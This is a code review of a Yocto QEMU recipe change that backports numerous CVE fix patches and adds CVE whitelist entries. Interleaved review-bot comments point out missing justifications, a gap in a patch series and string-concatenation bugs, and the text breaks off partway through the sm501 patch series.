354RDEPENDS_${PN}-ptest_append_libc-glibc = " locale-base-tr-tr.iso-8859-9" 358RDEPENDS_${PN}-ptest_append_libc-glibc = " locale-base-tr-tr.iso-8859-9"
355RDEPENDS_${PN}-tkinter += "${@bb.utils.contains('PACKAGECONFIG', 'tk', 'tk tk-lib', '', d)}" 359RDEPENDS_${PN}-tkinter += "${@bb.utils.contains('PACKAGECONFIG', 'tk', 'tk tk-lib', '', d)}"
356RDEPENDS_${PN}-dev = "" 360RDEPENDS_${PN}-dev = ""
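Review bot: The new `CVE_CHECK_WHITELIST` entries for CVE-2015-20107 and CVE-2023-36632 suppress those IDs in the CVE report on the strength of a one-line comment with no reference. For CVE-2015-20107 the comment says the mailcap module cannot be fixed in a meaningful way, yet the module is presumably still packaged, so image owners lose the only signal that it ships. For CVE-2023-36632, "expected behaviour" is asserted without a source. I would extend each comment with the upstream statement it relies on, e.g. `# Not an issue, in fact expected behaviour, see <upstream statement URL>`, and re-check the mailcap wording against the 3.8.18 release this recipe now builds.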
diff --git a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
index d83ee59375..5ae6a37f26 100644
--- a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
@@ -9,7 +9,7 @@ DEPENDS = "glib-2.0-native zlib-native pixman-native qemu-native bison-native"
9 9
10EXTRA_OECONF_append = " --target-list=${@get_qemu_system_target_list(d)}" 10EXTRA_OECONF_append = " --target-list=${@get_qemu_system_target_list(d)}"
11 11
12PACKAGECONFIG ??= "fdt alsa kvm" 12PACKAGECONFIG ??= "fdt alsa kvm slirp"
13 13
14# Handle distros such as CentOS 5 32-bit that do not have kvm support 14# Handle distros such as CentOS 5 32-bit that do not have kvm support
15PACKAGECONFIG_remove = "${@'kvm' if not os.path.exists('/usr/include/linux/kvm.h') else ''}" 15PACKAGECONFIG_remove = "${@'kvm' if not os.path.exists('/usr/include/linux/kvm.h') else ''}"
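Review bot: `PACKAGECONFIG ??= "fdt alsa kvm slirp"` builds the user-mode network stack into every native system emulator by default, and the line carries no comment saying why. That code handles guest-generated traffic inside the QEMU process, so widening the default deserves a stated reason next to the assignment. If the motivation is networking without tap devices, a comment such as `# slirp: user-mode networking, no tap device or root needed` above the line would record it.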
diff --git a/meta/recipes-devtools/qemu/qemu.inc b/meta/recipes-devtools/qemu/qemu.inc
index a1a418374f..59ff69d51d 100644
--- a/meta/recipes-devtools/qemu/qemu.inc
+++ b/meta/recipes-devtools/qemu/qemu.inc
@@ -35,30 +35,147 @@ SRC_URI = "https://download.qemu.org/${BPN}-${PV}.tar.xz \
35 file://CVE-2020-7039-2.patch \ 35 file://CVE-2020-7039-2.patch \
36 file://CVE-2020-7039-3.patch \ 36 file://CVE-2020-7039-3.patch \
37 file://0001-Add-enable-disable-udev.patch \ 37 file://0001-Add-enable-disable-udev.patch \
38 file://CVE-2020-7211.patch \ 38 file://CVE-2020-7211.patch \
39 file://0001-qemu-Do-not-include-file-if-not-exists.patch \ 39 file://0001-qemu-Do-not-include-file-if-not-exists.patch \
40 file://CVE-2020-11102.patch \ 40 file://CVE-2020-11102.patch \
41 file://CVE-2020-11869.patch \ 41 file://CVE-2020-11869.patch \
42 file://CVE-2020-13361.patch \ 42 file://CVE-2020-13361.patch \
43 file://CVE-2020-10761.patch \ 43 file://CVE-2020-10761.patch \
44 file://CVE-2020-10702.patch \ 44 file://CVE-2020-10702.patch \
45 file://CVE-2020-13659.patch \ 45 file://CVE-2020-13659.patch \
46 file://CVE-2020-13800.patch \ 46 file://CVE-2020-13800.patch \
47 file://CVE-2020-13362.patch \ 47 file://CVE-2020-13362.patch \
48 file://CVE-2020-15863.patch \ 48 file://CVE-2020-15863.patch \
49 file://CVE-2020-14364.patch \ 49 file://CVE-2020-14364.patch \
50 file://CVE-2020-14415.patch \ 50 file://CVE-2020-14415.patch \
51 file://CVE-2020-16092.patch \ 51 file://CVE-2020-16092.patch \
52 file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \ 52 file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \
53 file://CVE-2019-20175.patch \ 53 file://CVE-2019-20175.patch \
54 file://CVE-2020-24352.patch \ 54 file://CVE-2020-24352.patch \
55 file://CVE-2020-25723.patch \ 55 file://CVE-2020-25723.patch \
56 " 56 file://CVE-2021-20203.patch \
57 file://CVE-2021-3392.patch \
58 file://CVE-2020-25085.patch \
59 file://CVE-2020-25624_1.patch \
60 file://CVE-2020-25624_2.patch \
61 file://CVE-2020-25625.patch \
62 file://CVE-2020-29443.patch \
63 file://CVE-2021-20221.patch \
64 file://CVE-2021-20181.patch \
65 file://CVE-2021-3416_1.patch \
66 file://CVE-2021-3416_2.patch \
67 file://CVE-2021-3416_3.patch \
68 file://CVE-2021-3416_5.patch \
69 file://CVE-2021-3416_6.patch \
70 file://CVE-2021-3416_7.patch \
71 file://CVE-2021-3416_8.patch \
72 file://CVE-2021-3416_9.patch \
73 file://CVE-2021-3416_10.patch \
74 file://CVE-2021-20257.patch \
75 file://CVE-2021-3544.patch \
76 file://CVE-2021-3544_2.patch \
77 file://CVE-2021-3544_3.patch \
78 file://CVE-2021-3544_4.patch \
79 file://CVE-2021-3544_5.patch \
80 file://CVE-2021-3545.patch \
81 file://CVE-2021-3546.patch \
82 file://CVE-2021-3527-1.patch \
83 file://CVE-2021-3527-2.patch \
84 file://CVE-2021-3582.patch \
85 file://CVE-2021-3607.patch \
86 file://CVE-2021-3608.patch \
87 file://CVE-2020-12829_1.patch \
88 file://CVE-2020-12829_2.patch \
89 file://CVE-2020-12829_3.patch \
90 file://CVE-2020-12829_4.patch \
91 file://CVE-2020-12829_5.patch \
92 file://CVE-2020-27617.patch \
93 file://CVE-2020-28916.patch \
94 file://CVE-2021-3682.patch \
95 file://CVE-2020-13253_1.patch \
96 file://CVE-2020-13253_2.patch \
97 file://CVE-2020-13253_3.patch \
98 file://CVE-2020-13253_4.patch \
99 file://CVE-2020-13253_5.patch \
100 file://CVE-2020-13791.patch \
101 file://CVE-2022-35414.patch \
102 file://CVE-2020-27821.patch \
103 file://CVE-2020-13754-1.patch \
104 file://CVE-2020-13754-2.patch \
105 file://CVE-2020-13754-3.patch \
106 file://CVE-2020-13754-4.patch \
107 file://CVE-2021-3713.patch \
108 file://CVE-2021-3748.patch \
109 file://CVE-2021-3930.patch \
110 file://CVE-2021-4206.patch \
111 file://CVE-2021-4207.patch \
112 file://CVE-2022-0216-1.patch \
113 file://CVE-2022-0216-2.patch \
114 file://CVE-2021-3750.patch \
115 file://CVE-2021-3638.patch \
116 file://CVE-2021-20196.patch \
117 file://CVE-2021-3507.patch \
118 file://hw-block-nvme-refactor-nvme_addr_read.patch \
119 file://hw-block-nvme-handle-dma-errors.patch \
120 file://CVE-2021-3929.patch \
121 file://CVE-2022-4144.patch \
122 file://CVE-2020-15859.patch \
123 file://CVE-2020-15469-1.patch \
124 file://CVE-2020-15469-2.patch \
125 file://CVE-2020-15469-3.patch \
126 file://CVE-2020-15469-4.patch \
127 file://CVE-2020-15469-5.patch \
128 file://CVE-2020-15469-6.patch \
129 file://CVE-2020-15469-7.patch \
130 file://CVE-2020-15469-8.patch \
131 file://CVE-2020-35504.patch \
132 file://CVE-2020-35505.patch \
133 file://CVE-2022-26354.patch \
134 file://CVE-2021-3409-1.patch \
135 file://CVE-2021-3409-2.patch \
136 file://CVE-2021-3409-3.patch \
137 file://CVE-2021-3409-4.patch \
138 file://CVE-2021-3409-5.patch \
139 file://hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch \
140 file://CVE-2023-0330.patch \
141 file://CVE-2023-3354.patch \
142 file://CVE-2023-3180.patch \
143 file://CVE-2020-24165.patch \
144 file://CVE-2023-5088.patch \
145 file://9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch \
146 file://CVE-2023-2861.patch \
147 "
57UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar" 148UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar"
58 149
59SRC_URI[md5sum] = "278eeb294e4b497e79af7a57e660cb9a" 150SRC_URI[md5sum] = "278eeb294e4b497e79af7a57e660cb9a"
60SRC_URI[sha256sum] = "d3481d4108ce211a053ef15be69af1bdd9dde1510fda80d92be0f6c3e98768f0" 151SRC_URI[sha256sum] = "d3481d4108ce211a053ef15be69af1bdd9dde1510fda80d92be0f6c3e98768f0"
61 152
153# Applies against virglrender < 0.6.0 and not qemu itself
154CVE_CHECK_WHITELIST += "CVE-2017-5957"
155
156# The VNC server can expose host files uder some circumstances. We don't
157# enable it by default.
158CVE_CHECK_WHITELIST += "CVE-2007-0998"
159
160# 'The issues identified by this CVE were determined to not constitute a vulnerability.'
161# https://bugzilla.redhat.com/show_bug.cgi?id=1609015#c11
162CVE_CHECK_WHITELIST += "CVE-2018-18438"
163
164# the issue introduced in v5.1.0-rc0
165CVE_CHECK_WHITELIST += "CVE-2020-27661"
166
167# As per https://nvd.nist.gov/vuln/detail/CVE-2023-0664
168# https://bugzilla.redhat.com/show_bug.cgi?id=2167423
169# this bug related to windows specific.
170CVE_CHECK_WHITELIST += "CVE-2023-0664"
171
172# As per https://bugzilla.redhat.com/show_bug.cgi?id=2203387
173# RHEL specific issue
174CVE_CHECK_WHITELIST += "CVE-2023-2680"
175
176# Affected only `qemu-kvm` shipped with Red Hat Enterprise Linux 8.3 release.
177CVE_CHECK_WHITELIST += "CVE-2021-20295"
178
62COMPATIBLE_HOST_mipsarchn32 = "null" 179COMPATIBLE_HOST_mipsarchn32 = "null"
63COMPATIBLE_HOST_mipsarchn64 = "null" 180COMPATIBLE_HOST_mipsarchn64 = "null"
64 181
@@ -197,6 +314,16 @@ PACKAGECONFIG[glusterfs] = "--enable-glusterfs,--disable-glusterfs"
197PACKAGECONFIG[xkbcommon] = "--enable-xkbcommon,--disable-xkbcommon,libxkbcommon" 314PACKAGECONFIG[xkbcommon] = "--enable-xkbcommon,--disable-xkbcommon,libxkbcommon"
198PACKAGECONFIG[libudev] = "--enable-libudev,--disable-libudev,eudev" 315PACKAGECONFIG[libudev] = "--enable-libudev,--disable-libudev,eudev"
199PACKAGECONFIG[libxml2] = "--enable-libxml2,--disable-libxml2,libxml2" 316PACKAGECONFIG[libxml2] = "--enable-libxml2,--disable-libxml2,libxml2"
317PACKAGECONFIG[seccomp] = "--enable-seccomp,--disable-seccomp,libseccomp"
318PACKAGECONFIG[capstone] = "--enable-capstone,--disable-capstone"
319# libnfs is currently provided by meta-kodi
320PACKAGECONFIG[libnfs] = "--enable-libnfs,--disable-libnfs,libnfs"
321PACKAGECONFIG[brlapi] = "--enable-brlapi,--disable-brlapi"
322PACKAGECONFIG[vde] = "--enable-vde,--disable-vde"
323# version 4.2.0 doesn't have an "internal" option for enable-slirp, so use "git" which uses the same configure code path
324PACKAGECONFIG[slirp] = "--enable-slirp=git,--disable-slirp"
325PACKAGECONFIG[rbd] = "--enable-rbd,--disable-rbd"
326PACKAGECONFIG[rdma] = "--enable-rdma,--disable-rdma"
200 327
201INSANE_SKIP_${PN} = "arch" 328INSANE_SKIP_${PN} = "arch"
202 329
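Review bot: The CVE-2021-3416 series added to SRC_URI runs `_1`, `_2`, `_3`, `_5` … `_10` with no `CVE-2021-3416_4.patch`. If part 4 was dropped on purpose, a comment next to the list should say so, otherwise the series is incomplete. In the whitelist block, CVE-2007-0998 is suppressed because the VNC server is not enabled by default, which also hides the ID for builds that do enable it; the comment should state that limit, and `uder` should read `under`. For `PACKAGECONFIG[slirp] = "--enable-slirp=git,--disable-slirp"` it is worth confirming that configure uses the sources bundled in the tarball and does not try to fetch a submodule during the build.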
diff --git a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
index 3a7d7bbd33..3789f1edea 100644
--- a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
+++ b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
@@ -60,7 +60,7 @@ Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
60 1 file changed, 5 insertions(+), 2 deletions(-) 60 1 file changed, 5 insertions(+), 2 deletions(-)
61 61
62diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c 62diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
63index 6f132c5f..8329950c 100644 63index 300c9765..2823db7d 100644
64--- a/fsdev/virtfs-proxy-helper.c 64--- a/fsdev/virtfs-proxy-helper.c
65+++ b/fsdev/virtfs-proxy-helper.c 65+++ b/fsdev/virtfs-proxy-helper.c
66@@ -13,7 +13,6 @@ 66@@ -13,7 +13,6 @@
@@ -71,9 +71,9 @@ index 6f132c5f..8329950c 100644
71 #include <sys/fsuid.h> 71 #include <sys/fsuid.h>
72 #include <sys/vfs.h> 72 #include <sys/vfs.h>
73 #include <sys/ioctl.h> 73 #include <sys/ioctl.h>
74@@ -27,7 +26,11 @@ 74@@ -28,7 +27,11 @@
75 #include "9p-iov-marshal.h"
76 #include "hw/9pfs/9p-proxy.h" 75 #include "hw/9pfs/9p-proxy.h"
76 #include "hw/9pfs/9p-util.h"
77 #include "fsdev/9p-iov-marshal.h" 77 #include "fsdev/9p-iov-marshal.h"
78- 78-
79+/* 79+/*
@@ -84,3 +84,6 @@ index 6f132c5f..8329950c 100644
84 #define PROGNAME "virtfs-proxy-helper" 84 #define PROGNAME "virtfs-proxy-helper"
85 85
86 #ifndef XFS_SUPER_MAGIC 86 #ifndef XFS_SUPER_MAGIC
87--
882.25.1
89
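diff --git a/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
new file mode 100644
index 0000000000..72d9c47bde
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
@@ -0,0 +1,63 @@
+From a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b Mon Sep 17 00:00:00 2001
+From: Omar Sandoval <osandov@fb.com>
+Date: Thu, 14 May 2020 08:06:43 +0200
+Subject: [PATCH] 9pfs: local: ignore O_NOATIME if we don't have permissions
+
+QEMU's local 9pfs server passes through O_NOATIME from the client. If
+the QEMU process doesn't have permissions to use O_NOATIME (namely, it
+does not own the file nor have the CAP_FOWNER capability), the open will
+fail. This causes issues when from the client's point of view, it
+believes it has permissions to use O_NOATIME (e.g., a process running as
+root in the virtual machine). Additionally, overlayfs on Linux opens
+files on the lower layer using O_NOATIME, so in this case a 9pfs mount
+can't be used as a lower layer for overlayfs (cf.
+https://github.com/osandov/drgn/blob/dabfe1971951701da13863dbe6d8a1d172ad9650/vmtest/onoatimehack.c
+and https://github.com/NixOS/nixpkgs/issues/54509).
+
+Luckily, O_NOATIME is effectively a hint, and is often ignored by, e.g.,
+network filesystems. open(2) notes that O_NOATIME "may not be effective
+on all filesystems. One example is NFS, where the server maintains the
+access time." This means that we can honor it when possible but fall
+back to ignoring it.
+
+Acked-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Signed-off-by: Omar Sandoval <osandov@fb.com>
+Message-Id: <e9bee604e8df528584693a4ec474ded6295ce8ad.1587149256.git.osandov@fb.com>
+Signed-off-by: Greg Kurz <groug@kaod.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b]
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/9pfs/9p-util.h | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
+index 79ed6b233e5..546f46dc7dc 100644
+--- a/hw/9pfs/9p-util.h
++++ b/hw/9pfs/9p-util.h
+@@ -37,9 +37,22 @@ static inline int openat_file(int dirfd, const char *name, int flags,
+ {
+ int fd, serrno, ret;
+
++again:
+ fd = openat(dirfd, name, flags | O_NOFOLLOW | O_NOCTTY | O_NONBLOCK,
+ mode);
+ if (fd == -1) {
++ if (errno == EPERM && (flags & O_NOATIME)) {
++ /*
++ * The client passed O_NOATIME but we lack permissions to honor it.
++ * Rather than failing the open, fall back without O_NOATIME. This
++ * doesn't break the semantics on the client side, as the Linux
++ * open(2) man page notes that O_NOATIME "may not be effective on
++ * all filesystems". In particular, NFS and other network
++ * filesystems ignore it entirely.
++ */
++ flags &= ~O_NOATIME;
++ goto again;
++ }
+ return -1;
+ }
+
+--
+GitLab
+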
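Review bot: The header of this backport does not say why the recipe carries it: it has no `CVE:` line and no note, while qemu.inc lists it directly before CVE-2023-2861.patch, which suggests it is a prerequisite for that fix. If that is the reason, one sentence in the header would record it, for example `Needed so that CVE-2023-2861.patch applies to hw/9pfs/9p-util.h`, in the way CVE-2020-12829_1.patch marks itself as `dep#1`. Without it a later cleanup could drop the file as an unrelated feature change and break the security patch that follows. openat_file's body continues outside the hunk.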
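--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch
@@ -0,0 +1,164 @@
+From e29da77e5fddf6480e3a0e80b63d703edaec751b Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH] sm501: Convert printf + abort to qemu_log_mask
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Some places already use qemu_log_mask() to log unimplemented features
+or errors but some others have printf() then abort(). Convert these to
+qemu_log_mask() and avoid aborting to prevent guests to easily cause
+denial of service.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: 305af87f59d81e92f2aaff09eb8a3603b8baa322.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 57 ++++++++++++++++++++++------------------------
+ 1 file changed, 27 insertions(+), 30 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index acc692531a..bd3ccfe311 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -727,8 +727,8 @@ static void sm501_2d_operation(SM501State *s)
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+ if (addressing != 0x0) {
+- printf("%s: only XY addressing is supported.\n", __func__);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
++ return;
+ }
+
+ if (rop_mode == 0) {
+@@ -754,8 +754,8 @@ static void sm501_2d_operation(SM501State *s)
+
+ if ((s->twoD_source_base & 0x08000000) ||
+ (s->twoD_destination_base & 0x08000000)) {
+- printf("%s: only local memory is supported.\n", __func__);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
++ return;
+ }
+
+ switch (operation) {
+@@ -823,9 +823,9 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+
+ default:
+- printf("non-implemented SM501 2D operation. %d\n", operation);
+- abort();
+- break;
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
++ operation);
++ return;
+ }
+
+ if (dst_base >= get_fb_addr(s, crt) &&
+@@ -892,9 +892,8 @@ static uint64_t sm501_system_config_read(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 system config : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
++ "register read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -948,15 +947,15 @@ static void sm501_system_config_write(void *opaque, hwaddr addr,
+ break;
+ case SM501_ENDIAN_CONTROL:
+ if (value & 0x00000001) {
+- printf("sm501 system config : big endian mode not implemented.\n");
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: system config big endian mode not"
++ " implemented.\n");
+ }
+ break;
+
+ default:
+- printf("sm501 system config : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (uint32_t)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
++ "register write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1207,9 +1206,8 @@ static uint64_t sm501_disp_ctrl_read(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 disp ctrl : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -1345,9 +1343,9 @@ static void sm501_disp_ctrl_write(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 disp ctrl : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (unsigned)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1433,9 +1431,8 @@ static uint64_t sm501_2d_engine_read(void *opaque, hwaddr addr,
+ ret = 0; /* Should return interrupt status */
+ break;
+ default:
+- printf("sm501 disp ctrl : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -1520,9 +1517,9 @@ static void sm501_2d_engine_write(void *opaque, hwaddr addr,
+ /* ignored, writing 0 should clear interrupt status */
+ break;
+ default:
+- printf("sm501 2d engine : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (unsigned)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2d engine register "
++ "write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1670,9 +1667,9 @@ static void sm501_update_display(void *opaque)
+ draw_line = draw_line32_funcs[dst_depth_index];
+ break;
+ default:
+- printf("sm501 update display : invalid control register value.\n");
+- abort();
+- break;
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: update display"
++ "invalid control register value.\n");
++ return;
+ }
+
+ /* set up to draw hardware cursor */
+--
+2.25.1
+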
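Review bot: Three of the new qemu_log_mask() messages lose a word break where adjacent string literals are joined: `"sm501: not implemented system config" "register read. ..."` (patch lines 73-74), the matching write message (lines 93-94) and `"sm501: update display" "invalid control register value.\n"` (lines 156-157) will print "configregister" and "displayinvalid". The fix is a trailing space on the first literal, e.g. `"sm501: not implemented system config "`. The default case in sm501_2d_engine_read (lines 131-132) also still says "disp ctrl register read", which looks carried over from the display-controller handler rather than naming the 2D engine. These are the strings someone searches for when a guest touches unimplemented registers, so if the backport has to stay identical to upstream it is worth recording that in the patch header instead.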
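--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch
@@ -0,0 +1,139 @@
+From 6f8183b5dc5b309378687830a25e85ea8fb860ea Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 2/5] sm501: Shorten long variable names in sm501_2d_operation
+
+This increases readability and cleans up some confusing naming.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Message-id: b9b67b94c46e945252a73c77dfd117132c63c4fb.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 45 ++++++++++++++++++++++-----------------------
+ 1 file changed, 22 insertions(+), 23 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index bd3ccfe311..f42d05e1e4 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -700,17 +700,16 @@ static inline void hwc_invalidate(SM501State *s, int crt)
+ static void sm501_2d_operation(SM501State *s)
+ {
+ /* obtain operation parameters */
+- int operation = (s->twoD_control >> 16) & 0x1f;
++ int cmd = (s->twoD_control >> 16) & 0x1F;
+ int rtl = s->twoD_control & 0x8000000;
+ int src_x = (s->twoD_source >> 16) & 0x01FFF;
+ int src_y = s->twoD_source & 0xFFFF;
+ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+ int dst_y = s->twoD_destination & 0xFFFF;
+- int operation_width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int operation_height = s->twoD_dimension & 0xFFFF;
++ int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ int height = s->twoD_dimension & 0xFFFF;
+ uint32_t color = s->twoD_foreground;
+- int format_flags = (s->twoD_stretch >> 20) & 0x3;
+- int addressing = (s->twoD_stretch >> 16) & 0xF;
++ int format = (s->twoD_stretch >> 20) & 0x3;
+ int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+@@ -721,12 +720,12 @@ static void sm501_2d_operation(SM501State *s)
+ /* get frame buffer info */
+ uint8_t *src = s->local_mem + src_base;
+ uint8_t *dst = s->local_mem + dst_base;
+- int src_width = s->twoD_pitch & 0x1FFF;
+- int dst_width = (s->twoD_pitch >> 16) & 0x1FFF;
++ int src_pitch = s->twoD_pitch & 0x1FFF;
++ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+- if (addressing != 0x0) {
++ if ((s->twoD_stretch >> 16) & 0xF) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
+ return;
+ }
+@@ -758,20 +757,20 @@ static void sm501_2d_operation(SM501State *s)
+ return;
+ }
+
+- switch (operation) {
++ switch (cmd) {
+ case 0x00: /* copy area */
+ #define COPY_AREA(_bpp, _pixel_type, rtl) { \
+ int y, x, index_d, index_s; \
+- for (y = 0; y < operation_height; y++) { \
+- for (x = 0; x < operation_width; x++) { \
++ for (y = 0; y < height; y++) { \
++ for (x = 0; x < width; x++) { \
+ _pixel_type val; \
+ \
+ if (rtl) { \
+- index_s = ((src_y - y) * src_width + src_x - x) * _bpp; \
+- index_d = ((dst_y - y) * dst_width + dst_x - x) * _bpp; \
++ index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \
++ index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \
+ } else { \
+- index_s = ((src_y + y) * src_width + src_x + x) * _bpp; \
+- index_d = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \
++ index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \
++ index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+ } \
+ if (rop_mode == 1 && rop == 5) { \
+ /* Invert dest */ \
+@@ -783,7 +782,7 @@ static void sm501_2d_operation(SM501State *s)
+ } \
+ } \
+ }
+- switch (format_flags) {
++ switch (format) {
+ case 0:
+ COPY_AREA(1, uint8_t, rtl);
+ break;
+@@ -799,15 +798,15 @@ static void sm501_2d_operation(SM501State *s)
+ case 0x01: /* fill rectangle */
+ #define FILL_RECT(_bpp, _pixel_type) { \
+ int y, x; \
+- for (y = 0; y < operation_height; y++) { \
+- for (x = 0; x < operation_width; x++) { \
+- int index = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \
++ for (y = 0; y < height; y++) { \
++ for (x = 0; x < width; x++) { \
++ int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+ *(_pixel_type *)&dst[index] = (_pixel_type)color; \
+ } \
+ } \
+ }
+
+- switch (format_flags) {
++ switch (format) {
+ case 0:
+ FILL_RECT(1, uint8_t);
+ break;
+@@ -824,14 +823,14 @@ static void sm501_2d_operation(SM501State *s)
+
+ default:
+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
+- operation);
++ cmd);
+ return;
+ }
+
+ if (dst_base >= get_fb_addr(s, crt) &&
+ dst_base <= get_fb_addr(s, crt) + fb_len) {
+- int dst_len = MIN(fb_len, ((dst_y + operation_height - 1) * dst_width +
+- dst_x + operation_width) * (1 << format_flags));
++ int dst_len = MIN(fb_len, ((dst_y + height - 1) * dst_pitch +
++ dst_x + width) * (1 << format));
+ if (dst_len) {
+ memory_region_set_dirty(&s->local_mem_region, dst_base, dst_len);
+ }
+--
+2.25.1
+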
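--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch
@@ -0,0 +1,47 @@
+From 2824809b7f8f03ddc6e2b7e33e78c06022424298 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 3/5] sm501: Use BIT(x) macro to shorten constant
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
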